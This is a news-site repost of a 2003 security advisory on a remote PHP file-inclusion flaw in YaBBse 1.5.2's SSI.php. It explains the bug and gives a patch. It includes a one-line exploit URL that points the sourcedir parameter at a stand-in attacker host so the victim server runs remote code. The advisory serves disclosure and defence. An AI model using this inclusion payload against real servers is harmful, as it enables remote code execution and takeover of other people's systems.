Users login

Create an account »

JOIN XATRIX

Users login

Home » Hacking News » II-Labs IIL-13: YaBBse remote code execution

II-Labs IIL-13: YaBBse remote code execution

by Nikola Strahija on May 10th, 2003 A vulnerability that allows remote code execution has been discovered. Similar vulnerability has been discovered in YaBB 1.5.1.


[ Illegal Instruction Labs Advisory ]
[------------------------------------------------------------------------]
Advisory name: Remote code execution in YaBBse 1.5.2 (php version)
Advisory number: 13
Application: Yet another Bulletin Board 1.5.2
Vendor: www.yabbse.org
Date: 06.05.2003
Impact: Attacker can execute arbitrary php code
Tested on: *
Discovered by: Dalibor Karlovic & DownBload
Mail me @: [email protected]
Homepage: www.kamikaza.org



======[ Overview
YaBB is widely used bulletin board system.



======[ Problem
One of the files that are included in main application is vulnerable
to remote code execution if it is accessed directly with certain
parameters.
Name of the file is SSI.php.
Simmilar bug was discovered in previous version YaBB 1.5.1.

SSI.php:
------------------------------------------
include_once ($sourcedir . '/Errors.php');
include_once ($sourcedir . '/Subs.php');
include_once ($sourcedir . '/Load.php');
------------------------------------------

We can define $sourcedir variable through URL and include some other
PHP script local or remote if remote inclusion is enabled in php.ini file.
Bug in not exploitable if PHP's registar_globals is set to off.




======[ Exploit

Exploit would look like this:
----cut here----
http://www.victim.com/yabbse/ssi.php?sourcedir=http://www.attacker.com
----cut here----

Attacker would place an Errors.php file on his server. The code included
would get executed on victim's server.
Attacker's httpd server should not have php enabled because the
script will be parsed before sending it to the victim.




======[ Solution

Add this line before include_once() lines mentioned above.

----cut here----
if (!isset($sourcedir)) $sourcedir = "";
----cut here----




======[ Greetz
Greetz goes to #hr.hackers and #linux .
Special greetz goes to (rand()): St0rm, BoyScout, h4z4rd, finis, Sunnis,
Fr1c, phreax, StYx, harlequin, LekaMan, Astral and active-security.
Shitz goes to stupid darkman, who will exploit this bug and claim that
he is a great hacker.


Newsletter signup

Signup to our monthly newsletter and stay in touch with IT news!

Free E-books

We've got ebooks! But they're not online. :( Please give us a few days to bring downloads back.

Contact

Have something to say or just wanna drop us a line? Please keep this in mind: to spam, we reply with spam.

Contact us »